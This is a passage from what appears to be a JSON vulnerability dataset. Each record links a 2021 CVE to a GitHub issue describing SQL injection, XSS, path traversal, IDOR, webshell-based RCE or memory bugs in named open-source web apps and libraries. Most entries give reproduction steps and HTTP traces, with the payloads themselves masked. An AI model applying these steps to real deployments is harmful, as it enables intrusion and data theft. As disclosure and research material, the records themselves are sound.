  71143. "Issue_Created_At": "2021-09-01T12:17:31Z",
  71144. "description": "SQL Injection in APITAG . Hi MENTIONTAG , I found a SQL injection vulnerability in the APITAG function. I can inject special characters in the URL to escape the SQL query in the backend because the user input is not sanitized. APITAG APITAG Bug: ERRORTAG At line NUMBERTAG the code does not sanitize the u parameter, so the SQL query can be escaped easily. Solution: Use the APITAG function before assigning APITAG to the username parameter (or, more robustly, a prepared statement with bound parameters). The code would look like: APITAG",
  71145. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71146. "severity": "CRITICAL",
  71147. "baseScore": 9.8,
  71148. "impactScore": 5.9,
  71149. "exploitabilityScore": 3.9
  71150. },
  71151. {
  71152. "CVE_ID": "CVE-2021-40618",
  71153. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/193",
  71154. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/193",
  71155. "Repo_new": "os4ed/opensis-classic",
  71156. "Issue_Created_At": "2021-09-01T12:48:52Z",
  71157. "description": "SQL Injection in file FILETAG . Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because input data is not sanitized, an attacker can inject malicious SQL into the query by controlling parameters such as APITAG , APITAG or APITAG , APITAG in file APITAG . Request ERRORTAG Response CODETAG APITAG FILETAG",
  71158. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71159. "severity": "CRITICAL",
  71160. "baseScore": 9.8,
  71161. "impactScore": 5.9,
  71162. "exploitabilityScore": 3.9
  71163. },
  71164. {
  71165. "CVE_ID": "CVE-2021-40635",
  71166. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/195",
  71167. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/195",
  71168. "Repo_new": "os4ed/opensis-classic",
  71169. "Issue_Created_At": "2021-09-01T15:52:40Z",
  71170. "description": "SQL Injection in id Parameter. Author: CP0 ERRORTAG NUMBERTAG K from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Due to no security mechanism was implemented in parameter id , attacker can inject arbitrary SQL query and extract database informations FILETAG Vulnerable code section FILETAG FILETAG FILETAG FILETAG Request and Response APITAG GET APITAG + &table_name=courses HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate X Requested With: APITAG Connection: close Referer: URLTAG Cookie: APITAG APITAG APITAG HTTP NUMBERTAG OK Date: Wed NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Vary: Accept Encoding Content Length NUMBERTAG Connection: close Content Type: text/html course_modal_request|| APITAG NUMBERTAG courses were found. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Reading APITAG APITAG APITAG APITAG APITAG APITAG Writing APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  71171. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71172. "severity": "HIGH",
  71173. "baseScore": 7.5,
  71174. "impactScore": 3.6,
  71175. "exploitabilityScore": 3.9
  71176. },
  71177. {
  71178. "CVE_ID": "CVE-2021-40636",
  71179. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/198",
  71180. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/198",
  71181. "Repo_new": "os4ed/opensis-classic",
  71182. "Issue_Created_At": "2021-09-05T08:05:52Z",
  71183. "description": "XSS and Error based SQL injection in FILETAG . Due to lack of protection, parameters APITAG , APITAG , id , APITAG can be abused to inject SQL queries to extract information from the database (and for other SQLi tricks); parameter msg can be used to inject an XSS payload and steal a user's cookie (and even take over the user's account) FILETAG As we can see, no security mechanism was implemented, which resulted in a lot of vulnerabilities. Exploiting FILETAG Injection point : APITAG Below, I've presented how information can be extracted via SQL injection. XSS can be exploited by giving the correct information in the other parameters and injecting JavaScript code into APITAG , msg . Request: APITAG GET APITAG APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: keep alive Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG Response: APITAG HTTP NUMBERTAG OK Date: Sun NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Vary: Accept Encoding Content Encoding: gzip Content Length NUMBERTAG Keep Alive: timeout NUMBERTAG ma NUMBERTAG Connection: Keep Alive Content Type: text/htmlx APITAG Solution Add security functions such as APITAG to sanitize parameters before processing or printing them out to the screen (prepared statements with bound parameters are the more robust fix for the SQL injection). For XSS, use htmlentities to properly encode the output.",
  71184. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71185. "severity": "HIGH",
  71186. "baseScore": 7.5,
  71187. "impactScore": 3.6,
  71188. "exploitabilityScore": 3.9
  71189. },
  71190. {
  71191. "CVE_ID": "CVE-2021-40637",
  71192. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/199",
  71193. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/199",
  71194. "Repo_new": "os4ed/opensis-classic",
  71195. "Issue_Created_At": "2021-09-05T10:01:03Z",
  71196. "description": "Reflected XSS in FILETAG . Description By injecting Javascript code, an attacker can steal the user's cookie and takeover the user's account. This happened because of the lack of security implementation for type parameter. Exploitation FILETAG Injection point: APITAG Request: APITAG GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: keep alive Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG Response: APITAG HTTP NUMBERTAG OK Date: Sun NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Content Length NUMBERTAG Keep Alive: timeout NUMBERTAG ma NUMBERTAG Connection: Keep Alive Content Type: text/html APITAG Solution: Before using any user's input, make sure to verify and sanitize it properly, trust nothing that's sent from the client. In the case of XSS, please consider using APITAG function to encode the user's input before printing it out to the user's screen",
  71197. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71198. "severity": "MEDIUM",
  71199. "baseScore": 6.1,
  71200. "impactScore": 2.7,
  71201. "exploitabilityScore": 2.8
  71202. },
  71203. {
  71204. "CVE_ID": "CVE-2021-40639",
  71205. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/27",
  71206. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/27",
  71207. "Repo_new": "jflyfox/jfinal_cms",
  71208. "Issue_Created_At": "2021-09-02T10:25:19Z",
  71209. "description": "Arbitrary file read. Any file in the web directory, including the database configuration file, and all files in the root directory can be read. poc: FILETAG APITAG FILETAG",
  71210. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71211. "severity": "HIGH",
  71212. "baseScore": 7.5,
  71213. "impactScore": 3.6,
  71214. "exploitabilityScore": 3.9
  71215. },
  71216. {
  71217. "CVE_ID": "CVE-2021-40656",
  71218. "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/25",
  71219. "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/25",
  71220. "Repo_new": "libsixel/libsixel",
  71221. "Issue_Created_At": "2021-09-03T03:34:45Z",
  71222. "description": "heap buffer overflow in PATHTAG Hi, I found a heap buffer overflow in the current master NUMBERTAG d NUMBERTAG URLTAG It is the same as the PATHTAG NUMBERTAG URLTAG (I found this problem NUMBERTAG days ago) OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG It's the command line's report: APITAG and here is the ASAN report for saitoha/libsixel URLTAG (the current master FILETAG At this position, [r NUMBERTAG rc NUMBERTAG will be APITAG => APITAG So, writing to data overflows the buffer and writes into a heap location (chunk) that should not be written to. heap info: Before: CODETAG After: CODETAG",
  71223. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  71224. "severity": "HIGH",
  71225. "baseScore": 8.8,
  71226. "impactScore": 5.9,
  71227. "exploitabilityScore": 2.8
  71228. },
  71229. {
  71230. "CVE_ID": "CVE-2021-40660",
  71231. "Issue_Url_old": "https://github.com/javadelight/delight-nashorn-sandbox/issues/117",
  71232. "Issue_Url_new": "https://github.com/javadelight/delight-nashorn-sandbox/issues/117",
  71233. "Repo_new": "javadelight/delight-nashorn-sandbox",
  71234. "Issue_Created_At": "2021-08-30T01:48:26Z",
  71235. "description": "An APITAG vulnerability can still be exploited after version NUMBERTAG. There is a weak expression that can be exploited to launch a DoS attack. FILETAG Execution stack is as follows: FILETAG POC: FILETAG Run result: FILETAG",
  71236. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  71237. "severity": "HIGH",
  71238. "baseScore": 7.5,
  71239. "impactScore": 3.6,
  71240. "exploitabilityScore": 3.9
  71241. },
  71242. {
  71243. "CVE_ID": "CVE-2021-40663",
  71244. "Issue_Url_old": "https://github.com/janbialostok/deep-assign/issues/1",
  71245. "Issue_Url_new": "https://github.com/janbialostok/deep-assign/issues/1",
  71246. "Repo_new": "janbialostok/deep-assign",
  71247. "Issue_Created_At": "2021-09-06T04:52:21Z",
  71248. "description": "Prototype Pollution in APITAG npm package. \u270d\ufe0f Description APITAG URLTAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG Proof of Concept LIVE POC LINK URLTAG CODETAG \ud83d\udca5 Impact May lead to Information PATHTAG External References for similar vulnerabilities/blogs: URLTAG CVETAG",
  71249. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71250. "severity": "CRITICAL",
  71251. "baseScore": 9.8,
  71252. "impactScore": 5.9,
  71253. "exploitabilityScore": 3.9
  71254. },
  71255. {
  71256. "CVE_ID": "CVE-2021-40669",
  71257. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/196",
  71258. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/196",
  71259. "Repo_new": "wuzhicms/wuzhicms",
  71260. "Issue_Created_At": "2021-09-05T14:05:26Z",
  71261. "description": "Wuzhicms NUMBERTAG PATHTAG has a SQL Injection Vulnerability. Vulnerability file: APITAG ERRORTAG The APITAG parameter is attacker-controllable and the filtering applied to the APITAG parameter is not rigorous. POC ERRORTAG FILETAG FILETAG",
  71262. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71263. "severity": "CRITICAL",
  71264. "baseScore": 9.8,
  71265. "impactScore": 5.9,
  71266. "exploitabilityScore": 3.9
  71267. },
  71268. {
  71269. "CVE_ID": "CVE-2021-40670",
  71270. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/197",
  71271. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/197",
  71272. "Repo_new": "wuzhicms/wuzhicms",
  71273. "Issue_Created_At": "2021-09-06T02:43:30Z",
  71274. "description": "Wuzhicms NUMBERTAG PATHTAG has a SQL Injection Vulnerability. Vulnerability file: APITAG ERRORTAG In the APITAG file, the APITAG parameter and the APITAG parameter of the listing method are attacker-controllable, and the APITAG parameter is not strictly filtered, causing a SQL injection vulnerability! POC ERRORTAG FILETAG FILETAG",
  71275. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71276. "severity": "CRITICAL",
  71277. "baseScore": 9.8,
  71278. "impactScore": 5.9,
  71279. "exploitabilityScore": 3.9
  71280. },
  71281. {
  71282. "CVE_ID": "CVE-2021-40674",
  71283. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/198",
  71284. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/198",
  71285. "Repo_new": "wuzhicms/wuzhicms",
  71286. "Issue_Created_At": "2021-09-06T13:00:49Z",
  71287. "description": "There are NUMBERTAG SQL injections in the Wuzhicms NUMBERTAG back end. There are NUMBERTAG SQL injections in the Wuzhicms NUMBERTAG back end. one Wuzhicms NUMBERTAG PATHTAG has a SQL Injection Vulnerability Vulnerability file: APITAG ERRORTAG the APITAG parameter is not strictly filtered, causing a SQL injection vulnerability! POC ERRORTAG FILETAG FILETAG two The second SQL injection and the first SQL injection are in different functions of the same file! Wuzhicms NUMBERTAG PATHTAG has a SQL Injection Vulnerability Vulnerability file: APITAG ERRORTAG APITAG and APITAG are attacker-controllable; the APITAG parameter is not strictly filtered, causing a SQL injection vulnerability! POC ERRORTAG FILETAG FILETAG three Wuzhicms NUMBERTAG PATHTAG has a SQL Injection Vulnerability Someone has submitted a SQL injection vulnerability in the file APITAG before ( URLTAG but I found that, in addition to the APITAG parameter, the APITAG parameter can also be injected! Vulnerability file: APITAG ERRORTAG APITAG NUMBERTAG and APITAG are attacker-controllable; the APITAG parameter is not strictly filtered, causing a SQL injection vulnerability! POC ERRORTAG FILETAG FILETAG",
  71288. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71289. "severity": "CRITICAL",
  71290. "baseScore": 9.8,
  71291. "impactScore": 5.9,
  71292. "exploitabilityScore": 3.9
  71293. },
  71294. {
  71295. "CVE_ID": "CVE-2021-40678",
  71296. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1476",
  71297. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1476",
  71298. "Repo_new": "piwigo/piwigo",
  71299. "Issue_Created_At": "2021-09-06T02:58:29Z",
  71300. "description": "Persistent Cross Site Scripting in Batch APITAG Description: In the single mode function of the Piwigo system, modifying the author parameter of a picture can cause persistent cross site scripting Vulnerable Instances: APITAG request ERRORTAG FILETAG Suggested fix: validate user input and encode the output before rendering it",
  71301. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71302. "severity": "MEDIUM",
  71303. "baseScore": 5.4,
  71304. "impactScore": 2.7,
  71305. "exploitabilityScore": 2.3
  71306. },
  71307. {
  71308. "CVE_ID": "CVE-2021-40812",
  71309. "Issue_Url_old": "https://github.com/libgd/libgd/issues/750",
  71310. "Issue_Url_new": "https://github.com/libgd/libgd/issues/750",
  71311. "Repo_new": "libgd/libgd",
  71312. "Issue_Created_At": "2021-09-05T05:18:46Z",
  71313. "description": "APITAG return value check. Hi, Two previous issues NUMBERTAG and NUMBERTAG show that a return value check for APITAG is necessary, and that a missing check can cause an out-of-bounds read with a corrupted TGA file. APITAG is similar to APITAG and it also reports the error condition in its return value. Some call sites of APITAG compare the return value to detect whether an error occurred (in FILETAG and FILETAG), but there are other call sites that do not check the return value, and the passed arguments are tainted and can be corrupted. This is the list of them: |file|function|line| | | | | |gd_webp.c| APITAG |gd_bmp.c | APITAG NUMBERTAG gd_bmp.c | APITAG NUMBERTAG APITAG so a return-value check for APITAG needs to be added at those call sites. Regards.",
  71314. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71315. "severity": "MEDIUM",
  71316. "baseScore": 6.5,
  71317. "impactScore": 3.6,
  71318. "exploitabilityScore": 2.8
  71319. },
  71320. {
  71321. "CVE_ID": "CVE-2021-40881",
  71322. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/57",
  71323. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/57",
  71324. "Repo_new": "sanluan/publiccms",
  71325. "Issue_Created_At": "2021-09-07T02:44:20Z",
  71326. "description": "The default bat file parameters are controllable, resulting in RCE. In the scheduled-task selection, the task parameters are attacker-controllable and the result is echoed directly, so the supplied parameters are passed into the default bat script and the output of the executed commands is echoed back. url\uff1a URLTAG FILETAG The task parameters should be validated before being passed to the script",
  71327. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71328. "severity": "CRITICAL",
  71329. "baseScore": 9.8,
  71330. "impactScore": 5.9,
  71331. "exploitabilityScore": 3.9
  71332. },
  71333. {
  71334. "CVE_ID": "CVE-2021-40882",
  71335. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1477",
  71336. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1477",
  71337. "Repo_new": "piwigo/piwigo",
  71338. "Issue_Created_At": "2021-09-07T03:39:07Z",
  71339. "description": "Persistent cross-site scripting in Piwigo album properties (version NUMBERTAG Description: The album name and description fields of the Piwigo system can be written with XSS code, resulting in persistent cross-site scripting attacks Vulnerable Instances: FILETAG FILETAG",
  71340. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71341. "severity": "MEDIUM",
  71342. "baseScore": 6.1,
  71343. "impactScore": 2.7,
  71344. "exploitabilityScore": 2.8
  71345. },
  71346. {
  71347. "CVE_ID": "CVE-2021-40883",
  71348. "Issue_Url_old": "https://github.com/emlog/emlog/issues/108",
  71349. "Issue_Url_new": "https://github.com/emlog/emlog/issues/108",
  71350. "Repo_new": "emlog/emlog",
  71351. "Issue_Created_At": "2021-09-09T01:15:50Z",
  71352. "description": "emlog NUMBERTAG has RCE vulnerability. in FILETAG line NUMBERTAG FILETAG After decompression, the uploaded file will be automatically saved PATHTAG so We can add our own webshell in the plugins file downloaded from the official APITAG upload and access it FILETAG",
  71353. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71354. "severity": "CRITICAL",
  71355. "baseScore": 9.8,
  71356. "impactScore": 5.9,
  71357. "exploitabilityScore": 3.9
  71358. },
  71359. {
  71360. "CVE_ID": "CVE-2021-40884",
  71361. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/992",
  71362. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/992",
  71363. "Repo_new": "projectsend/projectsend",
  71364. "Issue_Created_At": "2021-09-07T05:13:56Z",
  71365. "description": "Insecure Object Reference in Files function. Dear MENTIONTAG MENTIONTAG , I have found an IDOR vulnerability in Files function. Description Because of not checking authorization in parameters ids and id , The user with uploader role can download , edit all files of users in application To Reproduce Download file NUMBERTAG Access url APITAG url NUMBERTAG Add value for id parameter from APITAG > APITAG to download all files in application FILETAG Edit File NUMBERTAG Access url APITAG NUMBERTAG Add value for id parameter from APITAG > APITAG to edit all files in application Files of user kietna on application FILETAG User kietna edit private file of admin user FILETAG FILETAG FILETAG Solution You need to check authorization for id and ids parameters, make sure that a user on the system can only interact with that user's files",
  71366. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  71367. "severity": "HIGH",
  71368. "baseScore": 8.1,
  71369. "impactScore": 5.2,
  71370. "exploitabilityScore": 2.8
  71371. },
  71372. {
  71373. "CVE_ID": "CVE-2021-40886",
  71374. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/993",
  71375. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/993",
  71376. "Repo_new": "projectsend/projectsend",
  71377. "Issue_Created_At": "2021-09-07T07:07:48Z",
  71378. "description": "Path traversal in Upload file function. Dear MENTIONTAG I found a Path traversal vulnerability on your application! Description Because of not checking if clause for chunks parameter and use APITAG wrapper, the user with Uploader role can add value APITAG for chunks param to bypass APITAG sanitizer and add another APITAG like APITAG to use APITAG wrapper and upload file to any place of server FILETAG In Step NUMBERTAG parameter that I can control when using upload function chunk , chunks , APITAG In Step NUMBERTAG The if clause check if chunks parameter < APITAG , the APITAG parameter will be handled. So i add value APITAG for chunks param then it will pass Step NUMBERTAG and go to Step NUMBERTAG FILETAG if i don't add value for chunk then the chunk parameter goes to APITAG and add value APITAG for chunks parameter, i can pass this if FILETAG Finally, if i add APITAG different from multipart , i can call APITAG wrapper to write a file on server with APITAG like APITAG Step To Reproduce NUMBERTAG Use burpsuite to capture upload request NUMBERTAG Change Content Type header to APITAG NUMBERTAG Add APITAG APITAG NUMBERTAG The file was uploaded in webroot directory with APITAG name FILETAG Request: ERRORTAG",
  71379. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  71380. "severity": "MEDIUM",
  71381. "baseScore": 6.5,
  71382. "impactScore": 3.6,
  71383. "exploitabilityScore": 2.8
  71384. },
  71385. {
  71386. "CVE_ID": "CVE-2021-40887",
  71387. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/994",
  71388. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/994",
  71389. "Repo_new": "projectsend/projectsend",
  71390. "Issue_Created_At": "2021-09-07T09:04:17Z",
  71391. "description": "Path Traversal vulnerability in FILETAG . Dear MENTIONTAG , I found a Path traversal vulnerability in FILETAG Description Because of lacking sanitization input for APITAG parameter, The attacker can add APITAG to move all of php files or any file on the system that has permissions to APITAG folder FILETAG Step To Reproduce NUMBERTAG Using burpsuite tool to capture request of FILETAG function NUMBERTAG Adding APITAG in APITAG parameter, in this step the attacker can move php files with the aim of sabotaging the system or read sensitive file in system like APITAG NUMBERTAG Then access APITAG to get a new name of file FILETAG NUMBERTAG Then access APITAG Request move APITAG file ERRORTAG FILETAG Then webroot returned Directory Listing because of moving APITAG file to APITAG folder FILETAG",
  71392. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71393. "severity": "CRITICAL",
  71394. "baseScore": 9.8,
  71395. "impactScore": 5.9,
  71396. "exploitabilityScore": 3.9
  71397. },
  71398. {
  71399. "CVE_ID": "CVE-2021-40888",
  71400. "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/995",
  71401. "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/995",
  71402. "Repo_new": "projectsend/projectsend",
  71403. "Issue_Created_At": "2021-09-08T02:13:10Z",
  71404. "description": "Reflected Cross site Scripting in APITAG function . Dear MENTIONTAG I found a vulnerability that execute malicious script of user, Description: Because of lacking of sanitizer when echo output data in APITAG function in APITAG , the low privilege user APITAG role) can call this function through FILETAG file and execute scripting code FILETAG FILETAG APITAG ERRORTAG FILETAG",
  71405. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71406. "severity": "MEDIUM",
  71407. "baseScore": 5.4,
  71408. "impactScore": 2.7,
  71409. "exploitabilityScore": 2.3
  71410. },
  71411. {
  71412. "CVE_ID": "CVE-2021-40889",
  71413. "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/19",
  71414. "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/19",
  71415. "Repo_new": "boiteasite/cmsuno",
  71416. "Issue_Created_At": "2021-09-09T04:11:04Z",
  71417. "description": "PHP Code Execution via change password function. Dear MENTIONTAG I found a security problem can lead to remote code execution in APITAG version NUMBERTAG Description: APITAG action in APITAG file call to APITAG function to write username in APITAG file when user successfully changed password, Because of filtere without APITAG the attacker can inject malicious php code into FILETAG FILETAG APITAG FILETAG When submit username and password, php code will be executed FILETAG",
  71418. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71419. "severity": "CRITICAL",
  71420. "baseScore": 9.8,
  71421. "impactScore": 5.9,
  71422. "exploitabilityScore": 3.9
  71423. },
  71424. {
  71425. "CVE_ID": "CVE-2021-40902",
  71426. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/57",
  71427. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/57",
  71428. "Repo_new": "flatcore/flatcore-cms",
  71429. "Issue_Created_At": "2021-09-06T15:27:36Z",
  71430. "description": "Stored XSS in Index. Describe the bug Cross Site Scripting (XSS) via save Exclude URLs To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS NUMBERTAG Click on APITAG new Page' after click APITAG NUMBERTAG Insert into a XSS payload in Exclude URLs NUMBERTAG And XSS save on : URLTAG Screenshots FILETAG XSS payload APITAG alert NUMBERTAG APITAG Desktop (please complete the following information): OS: all Browser : all Version : all Additional context The XSS attack will help the hacker get the login session of other users requiring them to have at least one APITAG new Pages\" permission.",
  71431. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71432. "severity": "MEDIUM",
  71433. "baseScore": 5.4,
  71434. "impactScore": 2.7,
  71435. "exploitabilityScore": 2.3
  71436. },
  71437. {
  71438. "CVE_ID": "CVE-2021-40921",
  71439. "Issue_Url_old": "https://github.com/dmolsen/Detector/issues/35",
  71440. "Issue_Url_new": "https://github.com/dmolsen/detector/issues/35",
  71441. "Repo_new": "dmolsen/detector",
  71442. "Issue_Created_At": "2021-09-09T08:02:29Z",
  71443. "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter cid without sufficient sanitization: URLTAG",
  71444. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71445. "severity": "MEDIUM",
  71446. "baseScore": 6.1,
  71447. "impactScore": 2.7,
  71448. "exploitabilityScore": 2.8
  71449. },
  71450. {
  71451. "CVE_ID": "CVE-2021-40922",
  71452. "Issue_Url_old": "https://github.com/pixeline/bugs/issues/552",
  71453. "Issue_Url_new": "https://github.com/pixeline/bugs/issues/552",
  71454. "Repo_new": "pixeline/bugs",
  71455. "Issue_Created_At": "2021-09-09T08:57:52Z",
  71456. "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter APITAG , APITAG , and email without sufficient sanitization: CVETAG CVETAG CVETAG",
  71457. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71458. "severity": "MEDIUM",
  71459. "baseScore": 6.1,
  71460. "impactScore": 2.7,
  71461. "exploitabilityScore": 2.8
  71462. },
  71463. {
  71464. "CVE_ID": "CVE-2021-40925",
  71465. "Issue_Url_old": "https://github.com/ladybirdweb/faveo-helpdesk/issues/5423",
  71466. "Issue_Url_new": "https://github.com/ladybirdweb/faveo-helpdesk/issues/5423",
  71467. "Repo_new": "ladybirdweb/faveo-helpdesk",
  71468. "Issue_Created_At": "2021-09-10T02:01:59Z",
  71469. "description": "APITAG XSS in FILETAG of bugs. Faveo Version NUMBERTAG and below versions PHP version NUMBERTAG Database Driver & Version : APITAG NUMBERTAG Server specification : Apache NUMBERTAG Turn on the APITAG in APITAG Description: Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Steps To Reproduce NUMBERTAG Go to the FILETAG NUMBERTAG Login NUMBERTAG Go to the page with the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled input APITAG in APITAG without sufficient sanitization: URLTAG Note Although the dompdf page is accessible from localhost, it can be attacked if the localhost user clicks on the aforementioned link. Downloaded from [ ] master branch [ ] release tag NUMBERTAG",
  71470. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71471. "severity": "MEDIUM",
  71472. "baseScore": 6.1,
  71473. "impactScore": 2.7,
  71474. "exploitabilityScore": 2.8
  71475. },
  71476. {
  71477. "CVE_ID": "CVE-2021-40926",
  71478. "Issue_Url_old": "https://github.com/JamesHeinrich/getID3/issues/341",
  71479. "Issue_Url_new": "https://github.com/jamesheinrich/getid3/issues/341",
  71480. "Repo_new": "jamesheinrich/getid3",
  71481. "Issue_Created_At": "2021-09-10T03:02:54Z",
  71482. "description": "APITAG XSS in FILETAG of APITAG NUMBERTAG Describe the bug Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. To Reproduce Steps to reproduce the behavior NUMBERTAG Access to the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled parameter showtagfiles without sufficient sanitization: URLTAG",
  71483. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71484. "severity": "MEDIUM",
  71485. "baseScore": 6.1,
  71486. "impactScore": 2.7,
  71487. "exploitabilityScore": 2.8
